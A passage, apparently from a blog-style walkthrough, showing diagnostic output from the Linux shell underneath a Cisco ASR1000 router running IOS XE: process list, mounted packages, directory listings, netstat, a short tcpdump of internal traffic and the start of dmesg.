0 S root 19376 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/emd_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19308_fifo
4 S root 19516 18585 0 69 -11 - 849 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
4 S root 19548 19093 0 80 0 - 4759 - Jan19 ? 00:10:55 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/cmand
4 S root 19554 19308 0 80 0 - 3509 - Jan19 ? 00:24:41 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/emd
0 S root 19627 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/fman_rp_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19516_fifo
4 S root 19819 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
4 S root 19866 19516 0 80 0 - 212518 - Jan19 ? 02:29:34 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/fman_rp -N
0 S root 19922 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/hman_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19819_fifo
4 S root 20092 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 20269 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/imand_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20092_fifo
4 S root 20293 19819 0 80 0 - 2903 - Jan19 ? 00:07:30 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/hman -c
4 S root 20527 18585 0 69 -11 - 850 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/rp/0/0/rp_base/mount/usr/binos/conf/pman.sh
0 S root 20569 20092 0 80 0 - 5693 - Jan19 ? 00:06:48 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/imand
0 S root 20635 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/periodic_sh_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20527_fifo
4 S root 20679 18585 0 69 -11 - 847 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 20760 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/plogd_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20679_fifo
4 S root 20835 20527 0 80 0 - 773 wait Jan19 ? 00:00:01 /bin/bash /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg/usr/binos/conf/periodic.sh
0 S root 20918 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f periodic -p /tmp/rp/trace/fifo/periodic_sh%rp_0_0_20835_fifo
4 S root 20963 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 21009 20679 0 80 0 - 2974 - Jan19 ? 00:00:01 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/plogd
0 S root 21122 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/ppc_linux_iosd_image_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20963_fifo
4 R root 21480 20963 21 80 0 - 1281874 stext Jan19 ? 2-19:10:17 /tmp/sw/mount/asr1000rp2-rpios-advipservicesk9.02.04.02.122-33.XND2.pkg/usr/binos/bin/ppc_linux_iosd-image -n 32768 -m 4400 -c /config
4 S root 21537 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 21595 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/psd_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_21537_fifo
4 S root 21709 18585 0 69 -11 - 849 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 21818 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/smand_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_21709_fifo
4 S root 21936 18585 0 69 -11 - 853 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/rp/0/0/rp_base/mount/usr/binos/conf/pman.sh
4 S root 21942 21537 0 80 0 - 3792 - Jan19 ? 00:00:00 /tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg/usr/binos/bin/psd -f /tmp/sw/rp/0/0/rp_security/mount/etc/psd/psd.xml
4 S root 21982 21709 0 80 0 - 16880 - Jan19 ? 00:12:42 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/smand -i /tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/conf/cdl.xml -H /tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/conf/cp_status.conf
0 S root 22045 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/sort_files_by_inode_sh_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_21936_fifo
0 S root 22190 21936 0 80 0 - 627 wait Jan19 ? 00:00:15 /bin/bash /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg/usr/binos/conf/sort_files_by_inode.sh
0 S root 25116 1 0 80 0 - 613 wait Jan19 ? 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh liin /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_liin.conf -dontfork
0 S root 25117 1 0 80 0 - 613 wait Jan19 ? 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
4 S root 25119 1 0 80 0 - 436 - Jan19 ? 00:00:00 /usr/bin/sntp -S
4 S root 25120 1 0 80 0 - 698 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/rollback_timer.sh
0 S root 25122 25116 0 80 0 - 515 - Jan19 ? 00:00:00 /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_liin.conf -dontfork
4 S root 25124 1 0 80 0 - 687 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/oom.sh
4 S root 25125 1 0 80 0 - 803 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/chasync.sh
4 S root 25126 1 0 80 0 - 769 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/iptbl.sh
0 S root 25127 25117 0 80 0 - 514 - Jan19 ? 00:00:00 /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
0 S root 25174 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f inst_rollback_timer -p /tmp/rp/trace/fifo/rollback_timer_sh%rp_0_0_25120_fifo
0 S root 25386 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f chasync -p /tmp/rp/trace/fifo/chasync_sh%rp_0_0_25125_fifo
0 S root 25426 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f iptbl -p /tmp/rp/trace/fifo/iptbl_sh%rp_0_0_25126_fifo
0 S root 25453 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f oom -p /tmp/rp/trace/fifo/oom_sh%rp_0_0_25124_fifo
0 S root 25454 25126 0 80 0 - 407 - Jan19 ? 00:00:00 inotifywait -r -m --format %w,%-e,%f -e create /tmp/rp/chasfs/etc/iptbl
1 S root 25473 25124 0 80 0 - 692 wait Jan19 ? 00:00:01 /bin/bash /usr/binos/conf/oom.sh
0 S root 25546 25120 0 80 0 - 406 - Jan19 ? 00:00:00 inotifywait -m --format %w,%-e,%f -e DELETE -e CREATE /bootflash/.rollback_timer /tmp/rp/rollback_timer
0 S root 25558 25125 0 80 0 - 410 - Jan19 ? 00:00:00 inotifywait -r -m --format %w,%-e,%f -e close_write -e move -e create -e delete /tmp/rp/chasfs/inventory /tmp/rp/chasfs/mastership /tmp/rp/chasfs/etc/prst_sync /tmp/rp/chasfs/etc/system_shell_access_logs
4 S root 6255 25122 0 80 0 - 772 wait 11:58 ? 00:00:00 /bin/bash /usr/binos/conf/in.telnetd.sh -L /usr/binos/conf/brelay.sh
4 S root 6322 6255 0 80 0 - 1211 - 11:58 ? 00:00:00 in.telnetd: 192.168.0.2
0 S root 6323 6322 0 80 0 - 771 wait 11:58 ttyp0 00:00:00 /bin/bash /usr/binos/conf/brelay.sh -h 192.168.0.2 -p
4 S binos 6390 6323 0 80 0 - 749 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/bexec.sh -c /usr/binos/conf/mcp_record_shell.sh -e BINOS_USER_NAME=?BINOS_USER_TTY=vty 0?BINOS_USER_UI_CLIENT=ios?
0 S binos 6393 6390 0 80 0 - 741 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/binos/conf/bexecute.sh -c /usr/binos/conf/mcp_record_shell.sh
4 S root 6394 6393 0 80 0 - 724 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_record_shell.sh
0 S root 6449 6394 0 80 0 - 398 - 11:58 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_R0.log.20100201115823
1 S root 6451 6449 0 80 0 - 399 - 11:58 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_R0.log.20100201115823
0 S root 6452 6451 0 80 0 - 638 wait 11:58 ttyp1 00:00:00 bash -i
0 S root 10744 25473 0 80 0 - 449 - 12:02 ? 00:00:00 sleep 100
0 S root 11483 22190 0 80 0 - 451 - 12:03 ? 00:00:00 sleep 45
0 S root 12291 20835 0 80 0 - 451 - 12:03 ? 00:00:00 sleep 300
0 S root 12416 19168 0 80 0 - 406 - 12:03 ? 00:00:00 inotifywait -t 60 -q -q /tmp/rp/trace/stage /harddisk/tracelogs
4 R root 12418 6452 0 80 0 - 659 - 12:03 ttyp1 00:00:00 ps -elf


Check the mounted directories:


[ASR1k_RP_0:/]$ mount
rootfs on / type rootfs (rw)
tmpfs on /tmp type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
none on /dev type tmpfs (rw)
/dev/bootflash1 on /bootflash type ext2 (rw)
/dev/loop1 on /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop2 on /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop3 on /tmp/sw/mount/asr1000rp2-rpios-advipservicesk9.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop4 on /tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop5 on /tmp/sw/mount/asr1000rp2-espbase.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop6 on /tmp/sw/mount/asr1000rp2-sipbase.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop7 on /tmp/sw/mount/asr1000rp2-sipspa.02.04.02.122-33.XND2.pkg type iso9660 (ro)
none on /dev type tmpfs (rw)
/proc/bus/usb on /proc/bus/usb type usbfs (rw)
automount(pid12513) on /vol type autofs (rw,fd=4,pgrp=12513,timeout=60,minproto=2,maxproto=4,indirect)
/dev/harddisk1 on /vol/harddisk type ext2 (rw,noatime,nodiratime)


You'll find the internal harddisk under /vol :


[ASR1k_RP_0:/]$ ls -al /vol
total 4
drwxr-xr-x 3 root root 0 Jan 22 11:39 .
drwxr-xr-x 19 904735 25 0 Jan 22 12:44 ..
drwxr-xr-x 5 root root 4096 Aug 10 05:25 harddisk

[ASR1k_RP_0:/]$ ls -al /vol/harddisk/
total 48
drwxr-xr-x 5 root root 4096 Aug 10 05:25 .
drwxr-xr-x 3 root root 0 Jan 22 11:39 ..
drwxr-xr-x 2 root root 4096 Sep 9 08:41 core
drwx------ 2 root root 16384 Aug 10 05:11 lost+found
drwxrwxrwx 2 root root 24576 Feb 1 10:22 tracelogs


You can check tracelogs messages directly from IOS using the "sh platform software trace message" command.

To see the IOS XE packages, which are mounted as loop devices :


[ASR1k_RP_0:/]$ ls -al /tmp/sw/mount
total 14
drwxr-xr-x 9 root root 180 Jan 19 06:57 .
drwxr-xr-x 14 root root 280 Jan 19 06:58 ..
dr-xr-xr-x 9 root root 2048 Nov 5 08:47 asr1000rp2-espbase.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 7 root root 2048 Nov 5 09:03 asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 9 root root 2048 Nov 5 09:02 asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 6 root root 2048 Nov 5 09:03 asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 6 root root 2048 Nov 5 09:02 asr1000rp2-rpios-advipservicesk9.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 9 root root 2048 Nov 5 08:46 asr1000rp2-sipbase.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 6 root root 2048 Nov 5 08:46 asr1000rp2-sipspa.02.04.02.122-33.XND2.pkg


Determine filetype of python (which is included in one of IOS XE packages) :


[ASR1k_RP_0:/]$ file /tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg/usr/bin/python
/tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg/usr/bin/python: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.18, dynamically linked (uses shared libs), stripped


Check connections :

[ASR1k_RP_0:/]$ netstat -av
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:2400 *:* LISTEN
tcp 0 0 *:nfs *:* LISTEN
tcp 0 0 *:2402 *:* LISTEN
tcp 0 0 *:2404 *:* LISTEN
tcp 0 0 *:2406 *:* LISTEN
tcp 0 0 *:2408 *:* LISTEN
tcp 0 0 *:rsync *:* LISTEN
tcp 0 0 *:2410 *:* LISTEN
tcp 0 0 *:2412 *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:2414 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:2416 *:* LISTEN
tcp 0 0 *:2000 *:* LISTEN
tcp 0 0 *:2001 *:* LISTEN
tcp 0 0 *:2418 *:* LISTEN
tcp 0 0 *:2002 *:* LISTEN
tcp 0 0 *:2004 *:* LISTEN
tcp 0 0 *:2420 *:* LISTEN
tcp 0 0 *:2006 *:* LISTEN
tcp 0 0 rp0-1:16023 *:* LISTEN
tcp 0 0 rp0-0:16023 *:* LISTEN
tcp 0 0 192.168.0.1:16023 *:* LISTEN
tcp 0 0 *:2007 *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:2008 *:* LISTEN
tcp 0 0 *:42873 *:* LISTEN
tcp 0 0 *:893 *:* LISTEN
tcp 0 0 rp0-0:50835 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:52708 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:51935 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:60769 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:59605 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:38252 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:42307 ESTABLISHED
tcp 0 0 rp0-0:33999 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:36453 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:36453 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:60769 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:38252 ESTABLISHED
tcp 0 0 rp0-0:42307 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:50835 ESTABLISHED
tcp 0 0 rp0-0:41683 rp0-0:2404 TIME_WAIT
tcp 0 0 rp0-0:2007 rp0-0:33999 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:59605 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:51935 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:52708 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:57909 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:51505 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:59003 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:49040 ESTABLISHED
tcp 0 0 rp0-0:2000 rp1-0:41398 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:55729 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:39608 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:59833 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:39923 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:39164 ESTABLISHED
tcp 0 0 rp0-0:2001 fp1-0:44301 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:32776 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:52535 ESTABLISHED
tcp 0 0 rp0-0:2006 fp1-0:44140 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:56444 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:46201 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:60288 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:35750 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:49577 ESTABLISHED
tcp 0 0 rp0-0:2000 fp1-0:36776 ESTABLISHED
tcp 0 0 rp0-0:2008 fp1-0:48583 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:51417 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:38141 ESTABLISHED
tcp 0 0 rp0-0:2004 fp1-0:38906 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:48903 ESTABLISHED
tcp 0 0 rp0-0:2004 fp0-0:43527 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:50988 ESTABLISHED
tcp 0 0 rp0-0:2006 fp0-0:55081 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:40246 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:52016 ESTABLISHED
tcp 0 2624 192.168.0.1:16023 192.168.0.2:26113 ESTABLISHED
tcp 0 0 rp0-0:37037 fp0-0:2518 TIME_WAIT
tcp 0 0 rp0-0:2000 cc1-0:37705 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:35159 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:51290 ESTABLISHED
tcp 0 0 rp0-0:2001 fp0-0:48236 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:46700 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:48745 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:36722 ESTABLISHED
tcp 0 0 rp0-0:2008 cc1-0:35195 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:36247 ESTABLISHED
tcp 0 0 rp0-0:2002 cc1-0:41618 ESTABLISHED
tcp 0 0 rp0-0:2416 fp0-0:47275 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:35749 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:49577 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:39850 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:35767 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:33982 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:41942 ESTABLISHED
tcp 0 0 rp0-0:2000 fp0-0:60374 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:52448 ESTABLISHED
tcp 0 0 rp0-0:2418 fp0-0:59884 ESTABLISHED
tcp 0 0 rp0-0:2008 fp0-0:60663 ESTABLISHED
udp 0 0 *:32768 *:*
udp 0 0 *:nfs *:*
udp 0 0 *:4006 *:*
udp 0 0 *:tftp *:*
udp 0 0 *:tftp-private *:*
udp 0 0 *:sunrpc *:*
udp 0 0 *:890 *:*
udp 0 0 *:ntp *:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 33582 /tmp/rp/lipc/chassis_mgr_socket
unix 2 [ ACC ] STREAM LISTENING 32347 /tmp/rp/lipc/interface_mgr_socket
unix 2 [ ] DGRAM 19425 @/org/kernel/udev/udevd
unix 2 [ ACC ] STREAM LISTENING 37744 /tmp/rp/lipc/resvport_iosquery
unix 2 [ ACC ] STREAM LISTENING 36468 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 2 [ ACC ] STREAM LISTENING 37749 /tmp/rp/lipc/iosd_vtymgt_socket
unix 2 [ ACC ] STREAM LISTENING 32118 /tmp/rp/lipc/forwarding_mgr_socket
unix 2 [ ACC ] STREAM LISTENING 36474 /tmp/rp/lipc/shell_mgr_ui_serv_socket
unix 2 [ ACC ] STREAM LISTENING 36477 /tmp/rp/lipc/shell_mgr_iosd_socket
unix 2 [ ACC ] STREAM LISTENING 32951 /tmp/rp/lipc/plog_iosd_serv_socket
unix 6 [ ] DGRAM 32954 /dev/log
unix 2 [ ] STREAM 16114379
unix 2 [ ] DGRAM 40132
unix 3 [ ] STREAM CONNECTED 37889 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37888
unix 3 [ ] STREAM CONNECTED 37814 /tmp/rp/lipc/plog_iosd_serv_socket
unix 3 [ ] STREAM CONNECTED 37807
unix 3 [ ] STREAM CONNECTED 37813 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37805
unix 3 [ ] STREAM CONNECTED 37812 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37804
unix 3 [ ] STREAM CONNECTED 37811 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37803
unix 3 [ ] STREAM CONNECTED 37810 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37802
unix 3 [ ] STREAM CONNECTED 37809 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37801
unix 3 [ ] STREAM CONNECTED 37808 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37800
unix 3 [ ] STREAM CONNECTED 37775 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37764
unix 3 [ ] STREAM CONNECTED 37774 /tmp/rp/lipc/shell_mgr_iosd_socket
unix 3 [ ] STREAM CONNECTED 37762
unix 3 [ ] STREAM CONNECTED 37771 /tmp/rp/lipc/interface_mgr_socket
unix 3 [ ] STREAM CONNECTED 37761
unix 3 [ ] STREAM CONNECTED 37763 /tmp/rp/lipc/forwarding_mgr_socket
unix 3 [ ] STREAM CONNECTED 37760
unix 3 [ ] STREAM CONNECTED 37661 /tmp/rp/lipc/chassis_mgr_socket
unix 2 [ ] DGRAM 36977
unix 2 [ ] DGRAM 36959
unix 2 [ ] DGRAM 29783
unix 2 [ ] DGRAM 23136
unix 2 [ ] DGRAM 23126


A little bit of sniffing internal communications (ifconfig causes a Segmentation fault) :


[ASR1k_RP_0:/]$ /usr/sbin/tcpdump
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on liin, link-type EN10MB (Ethernet), capture size 68 bytes
10:36:33.354644 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 1584868254 win 3133
10:36:33.354949 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 1:148(147) ack 0 win 6432
10:36:33.555735 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 148 win 2986
10:36:33.555889 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 148:320(172) ack 0 win 6432
10:36:33.759245 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 320 win 2814
10:36:33.760154 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 320:487(167) ack 0 win 6432
10:36:33.760278 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 487 win 4128
10:36:33.761138 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 487:654(167) ack 0 win 6432
10:36:33.961457 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 654 win 3961
10:36:33.962425 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 654:821(167) ack 0 win 6432
10:36:34.162703 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 821 win 3794
10:36:34.163674 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 821:988(167) ack 0 win 6432
10:36:34.380235 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 988 win 3627
10:36:34.380949 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 988:1155(167) ack 0 win 6432
10:36:34.581488 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 1155 win 3460


Print the kernel message buffer (and a lot of details about the hardware):

[ASR1k_RP_0:/]$ dmesg
Bootdata ok (command line is root=/dev/ram rw console=ttyS1,9600 max_loop=64 SR_BOOT=bootflash:asr1000rp2-advipservicesk9.02.04.02.122-33.XND2.bin)
Linux version 2.6.18.8 (mcpre@mcp-bld-lnx-113) (gcc version 4.2.1) #8 SMP Wed Nov 4 23:10:18 PST 2009
BIOS-provided physical RAM map:
BIOS-e820: 0000000000000000 - 000000000008f000 (usable)
BIOS-e820: 000000000008f000 - 0000000000090000 (ACPI NVS)
BIOS-e820: 0000000000090000 - 00000000000a0000 (usable)
BIOS-e820: 0000000000100000 - 0000000061eca000 (usable)
BIOS-e820: 0000000061eca000 - 000000006f623000 (reserved)
BIOS-e820: 000000006f623000 - 000000007e716000 (usable)
BIOS-e820: 000000007e716000 - 000000007e71e000 (ACPI NVS)
BIOS-e820: 000000007e71e000 - 000000007e72f000 (usable)
BIOS-e820: 000000007e72f000 - 000000007e731000 (reserved)
BIOS-e820: 000000007e731000 - 000000007e733000 (usable)
BIOS-e820: 000000007e733000 - 000000007e735000 (reserved)
BIOS-e820: 000000007e735000 - 000000007e737000 (usable)
BIOS-e820: 000000007e737000 - 000000007e739000 (reserved)
BIOS-e820: 000000007e739000 - 000000007e73b000 (usable)
BIOS-e820: 000000007e73b000 - 000000007e73d000 (reserved)
BIOS-e820: 000000007e73d000 - 000000007e741000 (usable)
BIOS-e820: 000000007e741000 - 000000007e742000 (reserved)
BIOS-e820: 000000007e742000 - 000000007e74b000 (usable)
BIOS-e820: 000000007e74b000 - 000000007e74c000 (reserved)
BIOS-e820: 000000007e74c000 - 000000007e751000 (usable)
BIOS-e820: 000000007e751000 - 000000007e755000 (reserved)
BIOS-e820: 000000007e755000 - 000000007e758000 (usable)
BIOS-e820: 000000007e758000 - 000000007e75a000 (reserved)
BIOS-e820: 000000007e75a000 - 000000007e762000 (ACPI data)
BIOS-e820: 000000007e762000 - 000000007e763000 (usable)
BIOS-e820: 000000007e763000 - 000000007e768000 (ACPI data)
BIOS-e820: 000000007e768000 - 000000007e774000 (usable)
BIOS-e820: 000000007e774000 - 000000007e77a000 (ACPI data)
BIOS-e820: 000000007e77a000 - 000000007e77c000 (usable)
BIOS-e820: 000000007e77c000 - 000000007e77d000 (ACPI NVS)
BIOS-e820: 000000007e77d000 - 000000007e77e000 (ACPI data)
BIOS-e820: 000000007e77e000 - 000000007e77f000 (ACPI NVS)
BIOS-e820: 000000007e77f000 - 000000007e781000 (usable)
BIOS-e820: 000000007e781000 - 000000007e785000 (reserved)
BIOS-e820: 000000007e785000 - 000000007e787000 (usable)
BIOS-e820: 000000007e787000 - 000000007e789000 (reserved)
BIOS-e820: 000000007e789000 - 000000007e78a000 (usable)
BIOS-e820: 000000007e78a000 - 000000007e78b000 (reserved)
BIOS-e820: 000000007e78b000 - 000000007e79d000 (usable)
BIOS-e820: 000000007e79d000 - 000000007e79e000 (ACPI data)
BIOS-e820: 000000007e79e000 - 000000007e820000 (usable)
BIOS-e820: 000000007e820000 - 000000007e824000 (reserved)
BIOS-e820: 000000007e824000 - 000000007e830000 (usable)
BIOS-e820: 000000007e830000 - 000000007e831000 (reserved)
BIOS-e820: 000000007e831000 - 000000007e842000 (usable)
BIOS-e820: 000000007e842000 - 000000007e845000 (reserved)
BIOS-e820: 000000007e845000 - 000000007e847000 (usable)
BIOS-e820: 000000007e847000 - 000000007e84b000 (reserved)
BIOS-e820: 000000007e84b000 - 000000007e84d000 (usable)
BIOS-e820: 000000007e84d000 - 000000007e859000 (reserved)
BIOS-e820: 000000007e859000 - 000000007e867000 (usable)
BIOS-e820: 000000007e867000 - 000000007e869000 (ACPI NVS)
BIOS-e820: 000000007e869000 - 000000007e86a000 (usable)
